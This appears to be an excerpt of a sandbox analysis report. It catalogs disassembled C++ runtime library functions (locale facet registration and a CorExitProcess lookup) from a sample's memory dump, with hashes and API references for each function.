Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: 2q
API String ID: 712880209-950290719
Opcode ID: 98ea5ce8fe12ed705d9838e778e136edcb38cdc625175305f4ecf6a251536f2b
Instruction ID: 6b972a490cb64e58c80348edddfaee5cd67c740fa161969849e42ecc364d497c
Opcode Fuzzy Hash: 98ea5ce8fe12ed705d9838e778e136edcb38cdc625175305f4ecf6a251536f2b
Instruction Fuzzy Hash: 8901C036A00119DFCB15EB64D849ABE77B1BF84720F254659F400A72D2CF7C9E45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00702424 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070242B
std::_Lockit::_Lockit.LIBCPMT ref: 00702435

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

collate.LIBCPMT ref: 0070246F
std::_Facet_Register.LIBCPMT ref: 00702486
std::_Lockit::~_Lockit.LIBCPMT ref: 007024A6

Strings

2q, xrefs: 00702493

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID: 2q
API String ID: 1007100420-950290719
Opcode ID: 351124fb189b8d690102e70c0000665c3000ed69b6f18f34d5f75acfce03e213
Instruction ID: 9067bb3301f08a96428a563b70723abf80d073bea14e45944f4b175cf3ecf2ba
Opcode Fuzzy Hash: 351124fb189b8d690102e70c0000665c3000ed69b6f18f34d5f75acfce03e213
Instruction Fuzzy Hash: EA01D236900119DFCB15EBA4D809ABE7BB1BF84720F244649F500A72D2DF7CAE01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007024B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007024C0
std::_Lockit::_Lockit.LIBCPMT ref: 007024CA

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

collate.LIBCPMT ref: 00702504
std::_Facet_Register.LIBCPMT ref: 0070251B
std::_Lockit::~_Lockit.LIBCPMT ref: 0070253B

Strings

2q, xrefs: 00702528

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID: 2q
API String ID: 1007100420-950290719
Opcode ID: 1cad8fb7a6123062cc1c4442dd46a53f3f562d8f379547d62c1801905ec53e44
Instruction ID: dff2e2bd00be5be3cf60c60bd66b242d6772efe9d6802cbebbb1af66a4f76a6b
Opcode Fuzzy Hash: 1cad8fb7a6123062cc1c4442dd46a53f3f562d8f379547d62c1801905ec53e44
Instruction Fuzzy Hash: F301D236900119DFCB15EB64D849ABE77B5BF84720F244649F400A72D2CF7C9E018B94

Uniqueness

Uniqueness Score: -1.00%

Function 0070254E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702555
std::_Lockit::_Lockit.LIBCPMT ref: 0070255F

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

ctype.LIBCPMT ref: 00702599
std::_Facet_Register.LIBCPMT ref: 007025B0
std::_Lockit::~_Lockit.LIBCPMT ref: 007025D0

Strings

2q, xrefs: 007025BD

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
String ID: 2q
API String ID: 83828444-950290719
Opcode ID: f967e6f1a481227d7d7c5ac6e4b0b775b2e496374b46ce01116d6dee60ef251f
Instruction ID: 578100abadf2c63c41cc9cb2a6414227f76b903cb6300cd49907f847f57c7c93
Opcode Fuzzy Hash: f967e6f1a481227d7d7c5ac6e4b0b775b2e496374b46ce01116d6dee60ef251f
Instruction Fuzzy Hash: 6801D236900119DFCB15EB64C819ABE77B1BF84320F254659F410AB2D2DF3C9E41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007025E3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007025EA
std::_Lockit::_Lockit.LIBCPMT ref: 007025F4

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

messages.LIBCPMT ref: 0070262E
std::_Facet_Register.LIBCPMT ref: 00702645
std::_Lockit::~_Lockit.LIBCPMT ref: 00702665

Strings

2q, xrefs: 00702652

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID: 2q
API String ID: 2750803064-950290719
Opcode ID: 92c3bbee86305f6a1649e7d1a3ac1a5e0957a81ca1ac113621af6487eaf2f614
Instruction ID: e81ee9d1991feadc4960c7c0a405ed593102a5ce7abce9ba21ead689c0289b0c
Opcode Fuzzy Hash: 92c3bbee86305f6a1649e7d1a3ac1a5e0957a81ca1ac113621af6487eaf2f614
Instruction Fuzzy Hash: 7E018036900119DFCB15EBA4D819ABE77B1BF94720F25460AF910A72D2CF7C9E01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00702678 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070267F
std::_Lockit::_Lockit.LIBCPMT ref: 00702689

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

messages.LIBCPMT ref: 007026C3
std::_Facet_Register.LIBCPMT ref: 007026DA
std::_Lockit::~_Lockit.LIBCPMT ref: 007026FA

Strings

2q, xrefs: 007026E7

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID: 2q
API String ID: 2750803064-950290719
Opcode ID: 74f9ec8a683f302c28ce74b40b66bd34fbe61ae229586f08a969365a874e1533
Instruction ID: 665df83a919fad8780f465132574f782fac87492c5f1815c11f5ad2633878c76
Opcode Fuzzy Hash: 74f9ec8a683f302c28ce74b40b66bd34fbe61ae229586f08a969365a874e1533
Instruction Fuzzy Hash: E801C036900119DFCF15EB64C849ABEB7B1BF84320F24460AE500A72D2CF7CAE018B94

Uniqueness

Uniqueness Score: -1.00%

Function 006FD6BD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 006FD6C4
std::_Lockit::_Lockit.LIBCPMT ref: 006FD6CE

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

codecvt.LIBCPMT ref: 006FD708
std::_Facet_Register.LIBCPMT ref: 006FD71F
std::_Lockit::~_Lockit.LIBCPMT ref: 006FD73F

Strings

2q, xrefs: 006FD72C

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: 2q
API String ID: 712880209-950290719
Opcode ID: 64f0e5bac5e620ae9978ab712a09c1128a17d814f52a6a5f2b5360569ddf5799
Instruction ID: 60aab5bbdd83d76588bc43270e0d98aaf05107587ccc9f4d94020f3122387bdf
Opcode Fuzzy Hash: 64f0e5bac5e620ae9978ab712a09c1128a17d814f52a6a5f2b5360569ddf5799
Instruction Fuzzy Hash: CF018C3590011DDFCB15FB64D84AABE77B2BF95720F25450AE600AB3D2CF78AE018B95

Uniqueness

Uniqueness Score: -1.00%

Function 0070E843 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070E84A
std::_Lockit::_Lockit.LIBCPMT ref: 0070E854

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

collate.LIBCPMT ref: 0070E88E
std::_Facet_Register.LIBCPMT ref: 0070E8A5
std::_Lockit::~_Lockit.LIBCPMT ref: 0070E8C5

Strings

2q, xrefs: 0070E8B2

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID: 2q
API String ID: 1007100420-950290719
Opcode ID: e217f982ffee87c5b1f3e9808c7f99e0768da6275ae543b62dc18628cc3414f1
Instruction ID: 1f552b9f385182895c1fe34e3456aa63f6b1db39aa8ed4a8cdcf7e7455f54904
Opcode Fuzzy Hash: e217f982ffee87c5b1f3e9808c7f99e0768da6275ae543b62dc18628cc3414f1
Instruction Fuzzy Hash: B9018075900119DFCB15FB64D805ABE77B1BF84720F258A1AF500AB2D1CF7C9E448B91

Uniqueness

Uniqueness Score: -1.00%

Function 0070E8D8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070E8DF
std::_Lockit::_Lockit.LIBCPMT ref: 0070E8E9

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

messages.LIBCPMT ref: 0070E923
std::_Facet_Register.LIBCPMT ref: 0070E93A
std::_Lockit::~_Lockit.LIBCPMT ref: 0070E95A

Strings

2q, xrefs: 0070E947

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID: 2q
API String ID: 2750803064-950290719
Opcode ID: b0fcba80c204ec70875a90e7c54f4f29e8d8fe88d6ffeb8699227d0bccd03283
Instruction ID: be5cc5a83976fd713e9465b4224a7397ec68a34749a76f61fd5ee2b22c0e87b7
Opcode Fuzzy Hash: b0fcba80c204ec70875a90e7c54f4f29e8d8fe88d6ffeb8699227d0bccd03283
Instruction Fuzzy Hash: E201C035900119DFCF14EBA4C805ABE77B1BF84720F250A4AE510AB2D2CF3CAE00CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00702961 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702968
std::_Lockit::_Lockit.LIBCPMT ref: 00702972

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

moneypunct.LIBCPMT ref: 007029AC
std::_Facet_Register.LIBCPMT ref: 007029C3
std::_Lockit::~_Lockit.LIBCPMT ref: 007029E3

Strings

2q, xrefs: 007029D0

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2q
API String ID: 419941038-950290719
Opcode ID: ac02d9b8813ef249b9f82a533284bbffc5272a9afd4296e753ba83bbbb084025
Instruction ID: 1870010b973982ee22a815814e59396343c187b51ed912f3e25a0384ea7fb8f8
Opcode Fuzzy Hash: ac02d9b8813ef249b9f82a533284bbffc5272a9afd4296e753ba83bbbb084025
Instruction Fuzzy Hash: 5A01CC76910119DFCB14EB64C80AABE77B1BF84320F25460AE510BB2D2DF7CAE018B91

Uniqueness

Uniqueness Score: -1.00%

Function 007029F6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007029FD
std::_Lockit::_Lockit.LIBCPMT ref: 00702A07

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

moneypunct.LIBCPMT ref: 00702A41
std::_Facet_Register.LIBCPMT ref: 00702A58
std::_Lockit::~_Lockit.LIBCPMT ref: 00702A78

Strings

2q, xrefs: 00702A65

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2q
API String ID: 419941038-950290719
Opcode ID: 7034ee7dcf13a2599219f194961a8bce29fcd9761b6a2bd021b95dfddb5ad841
Instruction ID: 8a57403a9d1edaddbc94d26a1c36504f783657fa67a6ee2231455ee249fd70c4
Opcode Fuzzy Hash: 7034ee7dcf13a2599219f194961a8bce29fcd9761b6a2bd021b95dfddb5ad841
Instruction Fuzzy Hash: DE01C076900119DFCB25FB64C849ABE77B1BF84320F258609F900A72D2DF3C9E028B94

Uniqueness

Uniqueness Score: -1.00%

Function 0070EA97 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070EA9E
std::_Lockit::_Lockit.LIBCPMT ref: 0070EAA8

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

moneypunct.LIBCPMT ref: 0070EAE2
std::_Facet_Register.LIBCPMT ref: 0070EAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 0070EB19

Strings

2q, xrefs: 0070EB06

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2q
API String ID: 419941038-950290719
Opcode ID: 77007b0cc72cbb1fdd2e93fc660a9c7c586176e1e5e05d7c688a9a61151aed07
Instruction ID: 6e37a02b897f30ee6d04addcf49b0c6733b6c1f1ee7fa32b10b35e02c0b6db4f
Opcode Fuzzy Hash: 77007b0cc72cbb1fdd2e93fc660a9c7c586176e1e5e05d7c688a9a61151aed07
Instruction Fuzzy Hash: FA01C075A00119DFCB24EB64D805ABE77B2BF84720F254A49E405A72D2CF3CAE00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00702A8B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702A92
std::_Lockit::_Lockit.LIBCPMT ref: 00702A9C

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

moneypunct.LIBCPMT ref: 00702AD6
std::_Facet_Register.LIBCPMT ref: 00702AED
std::_Lockit::~_Lockit.LIBCPMT ref: 00702B0D

Strings

2q, xrefs: 00702AFA

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2q
API String ID: 419941038-950290719
Opcode ID: 80c3fbf5fae7b572a60a1580c6814cf72f2b8b5c3f08a3de4f67a165256321dd
Instruction ID: 55fd2f4bdaa8fef42617b42b6462d9d6222482a09c1e6ab5cf7e20b6db82c1f0
Opcode Fuzzy Hash: 80c3fbf5fae7b572a60a1580c6814cf72f2b8b5c3f08a3de4f67a165256321dd
Instruction Fuzzy Hash: FC018476900219DFCB15EB64D849BBE77B1BF84720F25460AE500A72D2DF7C9E01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00702B20 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702B27
std::_Lockit::_Lockit.LIBCPMT ref: 00702B31

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

moneypunct.LIBCPMT ref: 00702B6B
std::_Facet_Register.LIBCPMT ref: 00702B82
std::_Lockit::~_Lockit.LIBCPMT ref: 00702BA2

Strings

2q, xrefs: 00702B8F

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2q
API String ID: 419941038-950290719
Opcode ID: dddffc25ee298464e03257f46fb87730c43dbcf43ef81546d9de37a0c933e07e
Instruction ID: ac99a658af1a483d25a4129a314df8947b46c0250afa65d1c1edca989c90d3b1
Opcode Fuzzy Hash: dddffc25ee298464e03257f46fb87730c43dbcf43ef81546d9de37a0c933e07e
Instruction Fuzzy Hash: 3901C076900219DBCB25EB64C84AABE77B1BF84720F254609F500A72D2DF3CAE018B94

Uniqueness

Uniqueness Score: -1.00%

Function 0070EB2C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070EB33
std::_Lockit::_Lockit.LIBCPMT ref: 0070EB3D

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

moneypunct.LIBCPMT ref: 0070EB77
std::_Facet_Register.LIBCPMT ref: 0070EB8E
std::_Lockit::~_Lockit.LIBCPMT ref: 0070EBAE

Strings

2q, xrefs: 0070EB9B

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2q
API String ID: 419941038-950290719
Opcode ID: 0e60a3dbf24fa5e75b4737a2cc5ec3d51215b0a537398e4edef29a98e1463e8a
Instruction ID: 4ba39f603889fe4cf0331537647586fa5024b98dccbc1c26d9a844e703fe5e33
Opcode Fuzzy Hash: 0e60a3dbf24fa5e75b4737a2cc5ec3d51215b0a537398e4edef29a98e1463e8a
Instruction Fuzzy Hash: 7C01C075900119DFCB15EB64D885ABE77B1BF84720F254A4AE411AB2D2CF7C9E008B95

Uniqueness

Uniqueness Score: -1.00%

Function 00702D74 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702D7B
std::_Lockit::_Lockit.LIBCPMT ref: 00702D85

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

numpunct.LIBCPMT ref: 00702DBF
std::_Facet_Register.LIBCPMT ref: 00702DD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00702DF6

Strings

2q, xrefs: 00702DE3

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID: 2q
API String ID: 743221004-950290719
Opcode ID: 678edfab541eef83830cb973def56de654cad00ddefaa8adc0cc2863e3d0a8a7
Instruction ID: ade238c1a9b25e1f73a5e4fc9ab277154db5fbd7b8166b9ee419e32d818b67e7
Opcode Fuzzy Hash: 678edfab541eef83830cb973def56de654cad00ddefaa8adc0cc2863e3d0a8a7
Instruction Fuzzy Hash: 8701C036900219DFCB15EBA4D809ABE77B1BF84320F254649E510A72D2CF7C9E018B94

Uniqueness

Uniqueness Score: -1.00%

Function 00722DEE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DBD9785B,0000000C,?,00000000,00736A6C,000000FF,?,00722DC1,?,?,00722D95,?), ref: 00722E23
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00722E35
FreeLibrary.KERNEL32(00000000,?,00000000,00736A6C,000000FF,?,00722DC1,?,?,00722D95,?), ref: 00722E57

Strings

